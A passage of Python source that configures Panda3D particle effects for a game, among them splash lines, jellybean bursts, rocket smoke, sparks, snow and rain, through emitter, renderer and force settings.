p1.factory.setLifespanBase(3.0000)
p1.factory.setLifespanSpread(0.0000)
p1.factory.setMassBase(1.0000)
p1.factory.setMassSpread(0.0000)
p1.factory.setTerminalVelocityBase(400.0000)
p1.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p1.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p1.renderer.setUserAlpha(1.00)
# Sprite parameters
p1.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p1.renderer.setXScaleFlag(0)
p1.renderer.setYScaleFlag(0)
p1.renderer.setAnimAngleFlag(0)
p1.renderer.setInitialXScale(0.5000)
p1.renderer.setFinalXScale(0.5000)
p1.renderer.setInitialYScale(0.5000)
p1.renderer.setFinalYScale(0.5000)
p1.renderer.setNonanimatedTheta(0.0000)
p1.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p1.renderer.setAlphaDisable(0)
# Emitter parameters
p1.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p1.emitter.setAmplitude(20.0000)
p1.emitter.setAmplitudeSpread(0.0000)
p1.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p1.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p1.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p1.emitter.setRadius(2.0000)
self.addParticles(p1)
p2 = Particles.Particles('particles-3')
# Particles parameters
p2.setFactory("PointParticleFactory")
p2.setRenderer("SpriteParticleRenderer")
p2.setEmitter("SphereVolumeEmitter")
p2.setPoolSize(50)
p2.setBirthRate(0.1000)
p2.setLitterSize(50)
p2.setLitterSpread(0)
p2.setSystemLifespan(0.0000)
p2.setLocalVelocityFlag(1)
p2.setSystemGrowsOlderFlag(0)
# Factory parameters
p2.factory.setLifespanBase(3.0000)
p2.factory.setLifespanSpread(0.0000)
p2.factory.setMassBase(1.0000)
p2.factory.setMassSpread(0.0000)
p2.factory.setTerminalVelocityBase(400.0000)
p2.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p2.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p2.renderer.setUserAlpha(1.00)
# Sprite parameters
p2.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p2.renderer.setXScaleFlag(0)
p2.renderer.setYScaleFlag(0)
p2.renderer.setAnimAngleFlag(0)
p2.renderer.setInitialXScale(0.5000)
p2.renderer.setFinalXScale(0.5000)
p2.renderer.setInitialYScale(0.5000)
p2.renderer.setFinalYScale(0.5000)
p2.renderer.setNonanimatedTheta(0.0000)
p2.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p2.renderer.setAlphaDisable(0)
# Emitter parameters
p2.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p2.emitter.setAmplitude(20.0000)
p2.emitter.setAmplitudeSpread(0.0000)
p2.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p2.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p2.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p2.emitter.setRadius(2.0000)
self.addParticles(p2)
p3 = Particles.Particles('particles-4')
# Particles parameters
p3.setFactory("PointParticleFactory")
p3.setRenderer("SpriteParticleRenderer")
p3.setEmitter("SphereVolumeEmitter")
p3.setPoolSize(50)
p3.setBirthRate(0.1000)
p3.setLitterSize(50)
p3.setLitterSpread(0)
p3.setSystemLifespan(0.0000)
p3.setLocalVelocityFlag(1)
p3.setSystemGrowsOlderFlag(0)
# Factory parameters
p3.factory.setLifespanBase(3.0000)
p3.factory.setLifespanSpread(0.0000)
p3.factory.setMassBase(1.0000)
p3.factory.setMassSpread(0.0000)
p3.factory.setTerminalVelocityBase(400.0000)
p3.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p3.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p3.renderer.setUserAlpha(1.00)
# Sprite parameters
p3.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p3.renderer.setXScaleFlag(0)
p3.renderer.setYScaleFlag(0)
p3.renderer.setAnimAngleFlag(0)
p3.renderer.setInitialXScale(0.5000)
p3.renderer.setFinalXScale(0.5000)
p3.renderer.setInitialYScale(0.5000)
p3.renderer.setFinalYScale(0.5000)
p3.renderer.setNonanimatedTheta(0.0000)
p3.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p3.renderer.setAlphaDisable(0)
# Emitter parameters
p3.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p3.emitter.setAmplitude(20.0000)
p3.emitter.setAmplitudeSpread(0.0000)
p3.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p3.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p3.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p3.emitter.setRadius(2.0000)
self.addParticles(p3)
p4 = Particles.Particles('particles-5')
# Particles parameters
p4.setFactory("PointParticleFactory")
p4.setRenderer("SpriteParticleRenderer")
p4.setEmitter("SphereVolumeEmitter")
p4.setPoolSize(50)
p4.setBirthRate(0.1000)
p4.setLitterSize(50)
p4.setLitterSpread(0)
p4.setSystemLifespan(0.0000)
p4.setLocalVelocityFlag(1)
p4.setSystemGrowsOlderFlag(0)
# Factory parameters
p4.factory.setLifespanBase(3.0000)
p4.factory.setLifespanSpread(0.0000)
p4.factory.setMassBase(1.0000)
p4.factory.setMassSpread(0.0000)
p4.factory.setTerminalVelocityBase(400.0000)
p4.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p4.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p4.renderer.setUserAlpha(1.00)
# Sprite parameters
p4.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p4.renderer.setXScaleFlag(0)
p4.renderer.setYScaleFlag(0)
p4.renderer.setAnimAngleFlag(0)
p4.renderer.setInitialXScale(0.5000)
p4.renderer.setFinalXScale(0.5000)
p4.renderer.setInitialYScale(0.5000)
p4.renderer.setFinalYScale(0.5000)
p4.renderer.setNonanimatedTheta(0.0000)
p4.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p4.renderer.setAlphaDisable(0)
# Emitter parameters
p4.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p4.emitter.setAmplitude(20.0000)
p4.emitter.setAmplitudeSpread(0.0000)
p4.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p4.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p4.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p4.emitter.setRadius(2.0000)
self.addParticles(p4)
p5 = Particles.Particles('particles-6')
# Particles parameters
p5.setFactory("PointParticleFactory")
p5.setRenderer("SpriteParticleRenderer")
p5.setEmitter("SphereVolumeEmitter")
p5.setPoolSize(50)
p5.setBirthRate(0.1000)
p5.setLitterSize(50)
p5.setLitterSpread(0)
p5.setSystemLifespan(0.0000)
p5.setLocalVelocityFlag(1)
p5.setSystemGrowsOlderFlag(0)
# Factory parameters
p5.factory.setLifespanBase(3.0000)
p5.factory.setLifespanSpread(0.0000)
p5.factory.setMassBase(1.0000)
p5.factory.setMassSpread(0.0000)
p5.factory.setTerminalVelocityBase(400.0000)
p5.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p5.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p5.renderer.setUserAlpha(1.00)
# Sprite parameters
p5.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p5.renderer.setXScaleFlag(0)
p5.renderer.setYScaleFlag(0)
p5.renderer.setAnimAngleFlag(0)
p5.renderer.setInitialXScale(0.5000)
p5.renderer.setFinalXScale(0.5000)
p5.renderer.setInitialYScale(0.5000)
p5.renderer.setFinalYScale(0.5000)
p5.renderer.setNonanimatedTheta(0.0000)
p5.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p5.renderer.setAlphaDisable(0)
# Emitter parameters
p5.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p5.emitter.setAmplitude(20.0000)
p5.emitter.setAmplitudeSpread(0.0000)
p5.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p5.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p5.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p5.emitter.setRadius(2.0000)
self.addParticles(p5)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def splashlines(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("LineParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(40)
p0.setBirthRate(1000)
p0.setLitterSize(40)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(2.0)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Line parameters
p0.renderer.setHeadColor(Vec4(0.02, 0.67, 0.92, 1.00))
p0.renderer.setTailColor(Vec4(1.00, 1.00, 1.00, 1.00))
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(9.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 9.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
# Sphere Volume parameters
p0.emitter.setRadius(3.2282)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def resistanceEffectBean(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("GeomParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(20)
p0.setBirthRate(0.1000)
p0.setLitterSize(20)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(3.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Geom parameters
#p0.renderer.setGeomNode(jellybean4.egg)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(20.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(2.0000)
self.addParticles(p0)
p1 = Particles.Particles('particles-2')
# Particles parameters
p1.setFactory("PointParticleFactory")
p1.setRenderer("GeomParticleRenderer")
p1.setEmitter("SphereVolumeEmitter")
p1.setPoolSize(20)
p1.setBirthRate(0.1000)
p1.setLitterSize(20)
p1.setLitterSpread(0)
p1.setSystemLifespan(0.0000)
p1.setLocalVelocityFlag(1)
p1.setSystemGrowsOlderFlag(0)
# Factory parameters
p1.factory.setLifespanBase(3.0000)
p1.factory.setLifespanSpread(0.0000)
p1.factory.setMassBase(1.0000)
p1.factory.setMassSpread(0.0000)
p1.factory.setTerminalVelocityBase(400.0000)
p1.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p1.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p1.renderer.setUserAlpha(1.00)
# Geom parameters
#p1.renderer.setGeomNode(jellybean4.egg)
# Emitter parameters
p1.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p1.emitter.setAmplitude(20.0000)
p1.emitter.setAmplitudeSpread(0.0000)
p1.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p1.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p1.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p1.emitter.setRadius(2.0000)
self.addParticles(p1)
p2 = Particles.Particles('particles-3')
# Particles parameters
p2.setFactory("PointParticleFactory")
p2.setRenderer("GeomParticleRenderer")
p2.setEmitter("SphereVolumeEmitter")
p2.setPoolSize(20)
p2.setBirthRate(0.1000)
p2.setLitterSize(20)
p2.setLitterSpread(0)
p2.setSystemLifespan(0.0000)
p2.setLocalVelocityFlag(1)
p2.setSystemGrowsOlderFlag(0)
# Factory parameters
p2.factory.setLifespanBase(3.0000)
p2.factory.setLifespanSpread(0.0000)
p2.factory.setMassBase(1.0000)
p2.factory.setMassSpread(0.0000)
p2.factory.setTerminalVelocityBase(400.0000)
p2.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p2.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p2.renderer.setUserAlpha(1.00)
# Geom parameters
#p2.renderer.setGeomNode(jellybean4.egg)
# Emitter parameters
p2.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p2.emitter.setAmplitude(20.0000)
p2.emitter.setAmplitudeSpread(0.0000)
p2.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p2.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p2.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p2.emitter.setRadius(2.0000)
self.addParticles(p2)
p3 = Particles.Particles('particles-4')
# Particles parameters
p3.setFactory("PointParticleFactory")
p3.setRenderer("GeomParticleRenderer")
p3.setEmitter("SphereVolumeEmitter")
p3.setPoolSize(20)
p3.setBirthRate(0.1000)
p3.setLitterSize(20)
p3.setLitterSpread(0)
p3.setSystemLifespan(0.0000)
p3.setLocalVelocityFlag(1)
p3.setSystemGrowsOlderFlag(0)
# Factory parameters
p3.factory.setLifespanBase(3.0000)
p3.factory.setLifespanSpread(0.0000)
p3.factory.setMassBase(1.0000)
p3.factory.setMassSpread(0.0000)
p3.factory.setTerminalVelocityBase(400.0000)
p3.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p3.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p3.renderer.setUserAlpha(1.00)
# Geom parameters
#p3.renderer.setGeomNode(jellybean4.egg)
# Emitter parameters
p3.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p3.emitter.setAmplitude(20.0000)
p3.emitter.setAmplitudeSpread(0.0000)
p3.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p3.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p3.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p3.emitter.setRadius(2.0000)
self.addParticles(p3)
p4 = Particles.Particles('particles-5')
# Particles parameters
p4.setFactory("PointParticleFactory")
p4.setRenderer("GeomParticleRenderer")
p4.setEmitter("SphereVolumeEmitter")
p4.setPoolSize(20)
p4.setBirthRate(0.1000)
p4.setLitterSize(20)
p4.setLitterSpread(0)
p4.setSystemLifespan(0.0000)
p4.setLocalVelocityFlag(1)
p4.setSystemGrowsOlderFlag(0)
# Factory parameters
p4.factory.setLifespanBase(3.0000)
p4.factory.setLifespanSpread(0.0000)
p4.factory.setMassBase(1.0000)
p4.factory.setMassSpread(0.0000)
p4.factory.setTerminalVelocityBase(400.0000)
p4.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p4.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p4.renderer.setUserAlpha(1.00)
# Geom parameters
#p4.renderer.setGeomNode(jellybean4.egg)
# Emitter parameters
p4.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p4.emitter.setAmplitude(20.0000)
p4.emitter.setAmplitudeSpread(0.0000)
p4.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p4.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p4.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p4.emitter.setRadius(2.0000)
self.addParticles(p4)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def tt_p_efx_rocketLaunchSmoke(self):
self.reset()
self.setPos(0.000, 0.000, 16.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(2.000, 2.000, 3.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(300)
p0.setBirthRate(0.1000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(4.0000)
p0.factory.setLifespanSpread(0.1000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAINOUT)
p0.renderer.setUserAlpha(0.47)
# Sprite parameters
#p0.renderer.addTextureFromFile('../../ttmodels/src/maps/tt_t_efx_smoke.tif')
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(2.0000)
p0.renderer.setFinalXScale(4.0000)
p0.renderer.setInitialYScale(1.0000)
p0.renderer.setFinalYScale(4.0000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
p0.renderer.getColorInterpolationManager().addLinear(0.0,1.0,Vec4(1.0,1.0,1.0,1.0),Vec4(0.58823531866073608,0.58823531866073608,0.58823531866073608,1.0),1)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(0.4000)
p0.emitter.setAmplitudeSpread(2.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, -5.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Disc parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('Gravity')
# Force parameters
force0 = LinearVectorForce(Vec3(0.0000, 0.0000, 2.5000), 1.0000, 0)
force0.setVectorMasks(1, 1, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def sparks(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("LineEmitter")
p0.setPoolSize(1024)
p0.setBirthRate(0.0200)
p0.setLitterSize(8)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.256)
p0.renderer.setFinalXScale(0.0000)
p0.renderer.setInitialYScale(0.256)
p0.renderer.setFinalYScale(0.0000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(1)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
p0.emitter.setAmplitude(0.0000)
p0.emitter.setAmplitudeSpread(10.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 1.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 1.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Line parameters
p0.emitter.setEndpoint1(Point3(0.5000, 5.0000, -0.5000))
p0.emitter.setEndpoint2(Point3(0.75000, -5.0000, 2.5000))
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('sparkforces')
# Force parameters
force0 = LinearVectorForce(Vec3(1.0000, 0.0000, 0.0000), -50.0000, 0)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -1.0000, 0.0000), 100.0000, 0)
force1.setActive(1)
f0.addForce(force1)
force2 = LinearVectorForce(Vec3(0.0000, 0.0000, -1.0000), 20.0000, 0)
force2.setActive(1)
f0.addForce(force2)
force3 = LinearJitterForce(50.0000, 0)
force3.setActive(1)
f0.addForce(force3)
self.addForceGroup(f0)
@particle
def drift(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("ZSpinParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("PointEmitter")
p0.setPoolSize(1024)
p0.setBirthRate(0.0750)
p0.setLitterSize(7)
p0.setLitterSpread(2)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.1750)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Z Spin factory parameters
p0.factory.enableAngularVelocity(1)
p0.factory.setInitialAngle(0.0000)
p0.factory.setInitialAngleSpread(45.0000)
p0.factory.setFinalAngle(0.0000)
p0.factory.setFinalAngleSpread(0.0000)
p0.factory.setAngularVelocity(0.0000)
p0.factory.setAngularVelocitySpread(90.0000)
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(0.50)
# Sprite parameters
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(1)
p0.renderer.setInitialXScale(0.375)
p0.renderer.setFinalXScale(0.750)
p0.renderer.setInitialYScale(0.375)
p0.renderer.setFinalYScale(0.750)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
#p0.renderer.setColorBlendMode(ColorBlendAttrib.MAdd,ColorBlendAttrib.OIncomingAlpha,ColorBlendAttrib.OOneMinusIncomingAlpha)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setLocation(Point3(0.0000,0.0000,0.0000))
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('Smoke')
# Force parameters
force0 = LinearVectorForce(Vec3(1.0000, 0.0000, 0.0000), 0.0000, 0)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -1.0000, 0.0000), 100.0000, 0)
force1.setActive(1)
f0.addForce(force1)
force2 = LinearVectorForce(Vec3(0.0000, 0.0000, 1.0000), 50.0000, 0)
force2.setActive(1)
f0.addForce(force2)
force4 = LinearJitterForce(100.0000, 0)
force4.setActive(1)
f0.addForce(force4)
self.addForceGroup(f0)
@particle
def snowdisk(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("ZSpinParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(1024)
p0.setBirthRate(0.0200)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(4.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Z Spin factory parameters
p0.factory.setInitialAngle(0.0000)
p0.factory.setInitialAngleSpread(10.0000)
p0.factory.enableAngularVelocity(1)
p0.factory.setAngularVelocity(0.0000)
p0.factory.setAngularVelocitySpread(500.0000)
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAIN)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_8/models/props/snowflake_particle", "**/p1_2")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(1)
p0.renderer.setInitialXScale(0.03125)
p0.renderer.setFinalXScale(0.50)
p0.renderer.setInitialYScale(0.03125)
p0.renderer.setFinalYScale(0.50)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(0.1000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Disc parameters
p0.emitter.setRadius(50.0000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('gravity')
# Force parameters
force0 = LinearVectorForce(Vec3(0.0000, 0.0000, -1.0000), 1.5000, 0)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearJitterForce(10.0000, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def raindisk(self):
self.reset()
self.setPos(0.0, 5.0, 50.0)
self.setHpr(0.0, 0.0, 0.0)
self.setScale(1.0, 1.0, 1.0)
p0 = Particles.Particles('particles-1')
p0.setFactory('PointParticleFactory')
p0.setRenderer('LineParticleRenderer')
p0.setEmitter('DiscEmitter')
p0.setPoolSize(4096)
p0.setBirthRate(0.02)
p0.setLitterSize(20)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
